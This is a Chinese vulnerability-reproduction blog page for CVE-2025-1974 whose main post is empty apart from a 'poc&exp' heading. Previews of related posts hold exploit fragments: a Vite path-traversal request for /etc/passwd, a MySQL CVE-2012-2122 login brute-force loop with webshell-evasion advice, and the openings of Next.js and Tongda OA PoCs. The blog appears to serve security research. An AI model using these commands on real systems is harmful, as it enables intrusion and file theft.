lan1ocのblogcve-2025-1974

cve-2025-1974

发表于2025-03-26|更新于2025-03-28|漏洞追踪
|浏览量:

poc&exp

项目

文章作者: lan1oc
文章链接: https://lan1oc.github.io/2025/03/26/%E5%AD%A6%E4%B9%A0%E7%AC%94%E8%AE%B0/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/cve-2025-1974/
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 lan1ocのblog!
漏洞复现
cover of previous post
上一篇
CVE-2025-30208复现
复现测绘hunter 1web.body="/@vite/client" poc1url/etc/passwd?raw 深度利用可以看这
cover of next post
下一篇
红队培训---day3
数据库漏洞利用mysqlcve-2012-2122使用mysql命令(随机密码)连接数据库 1mysql -uroot -pwrong -h 10.3.4.87 -P3306 连接失败写一个for循环,利用cve-2012-2122漏洞,最后可以连接进入mysql数据库中win: 1for /l %i in (1,1,1000) do mysql -uroot -pwrong -h 10.3.4.87 -P3306 linux: 1for i in `seq 1 1000`;do mysql -h 10.3.4.87 -uroot -proot -P3306;done 循环一段时间后即可成功(离谱,破到一半靶机断联了) 进一步利用(判断能否读写文件)判定mysql可读可写目录 1show variables like "%secure_file_priv%"; 12341.值为空代表任意读写2.有路径,代表特定路径可读写3.NULL为不可读写 写文件写文件不要直接写马,会被直接杀,建议先写探针,这样可以验证是否被解析 1select...
相关推荐
cover
2025-03-26
CVE-2025-30208复现
复现测绘hunter 1web.body="/@vite/client" poc1url/etc/passwd?raw 深度利用可以看这
cover
2025-12-05
nextjs通杀,dify通杀(cve-2025-55182)
影响范围 React: 19.0.0, 19.1.0, 19.1.1, 19.2.0 Next.js: 15.x, 16.x (App Router) hunter指纹1(web.body="react.production.min.js"||web.body="React.createElement"||app="React.js"||app="Dify") poc12345678910111213141516171819202122POST / HTTP/1.1Host: admin.chaini.topUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/60.0.3112.113 Safari/537.36 Assetnote/1.0.0Next-Action: xX-Nextjs-Request-Id:...
cover
2025-03-17
通达oa漏洞复现
看版本:/inc/expired.php基本就是先用liqun工具箱吧,有的洞版本太老了就不管了适用于_通达_11.X全版本yii 前台反序列化(测试于11.7,小于12.3)有点难利用,过滤的函数挺多的:exec,shell_exec,system,passthru,proc_open,show_source,phpinfo,popen,dl,eval,proc_terminate,touch,escapeshellcmd,escapeshellarg不会绕过写shell,放弃了poc: 12345678910111213141516171819202122232425262728293031323334353637383940414243444546474849505152535455565758596061626364656667686970717273747576777879808182838485<?php namespace yii\rest{ class CreateAction{ ...
avatar
lan1oc
57qv6I+c54uX572i5LqG
文章
107
标签
31
分类
10
没啥用的仓库
公告
随便写写
目录
  1. 1. poc&exp
最新文章
linux版微信1click rce复现,国产系统通杀
linux版微信1click rce复现,国产系统通杀2026-02-10
书接上回失败的shiro,成功打通,SCM Manager测试,弱口令至rce,但shiro依旧奇怪
书接上回失败的shiro,成功打通,SCM Manager测试,弱口令至rce,但shiro依旧奇怪2026-02-05
[记录]尝试shiro有key无链利用,但失败
[记录]尝试shiro有key无链利用,但失败2026-01-13
挖矿病毒事件的后门分析
挖矿病毒事件的后门分析2025-12-30
笔记10——ida_pro mcp的安装
笔记10——ida_pro mcp的安装2025-12-29
©2023 - 2026 By lan1oc
框架 Hexo 7.3.0|主题 Butterfly 5.3.5